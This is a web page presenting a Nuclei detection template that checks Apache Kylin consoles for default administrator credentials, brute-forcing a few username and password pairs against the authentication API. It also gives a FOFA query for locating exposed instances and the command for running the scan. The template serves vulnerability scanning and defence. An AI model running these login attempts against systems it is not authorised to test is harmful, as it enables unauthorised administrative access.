Skip to content

Apache Kylin Console - Default Login

ID: kylin-default-login

Severity: high

Author: SleepingBag945

Tags: kylin,default-login,apache

The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0.

id: kylin-default-login
info:
name: Apache Kylin Console - Default Login
author: SleepingBag945
severity: high
description: |
The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0.
reference:
- https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml
- https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker
classification:
cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: apache
product: kylin
fofa-query: app="APACHE-kylin"
tags: kylin,default-login,apache
http:
- raw:
- |
GET /kylin/api/user/authentication HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
attack: clusterbomb
payloads:
username:
- ADMIN
- admin
password:
- KYLIN
- kylin
- 123456
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"userDetails":'
- '"username":'
- '"password":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402204b2fee812973d748d225684852ef46b7a7f6f652d3adc62af70ba71670c31762022048eee59b3d66cbaa477fa5629435aebfccc3845dfc38eb375a141c289ab7f3fd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/apache/kylin-default-login.yaml"

View on Github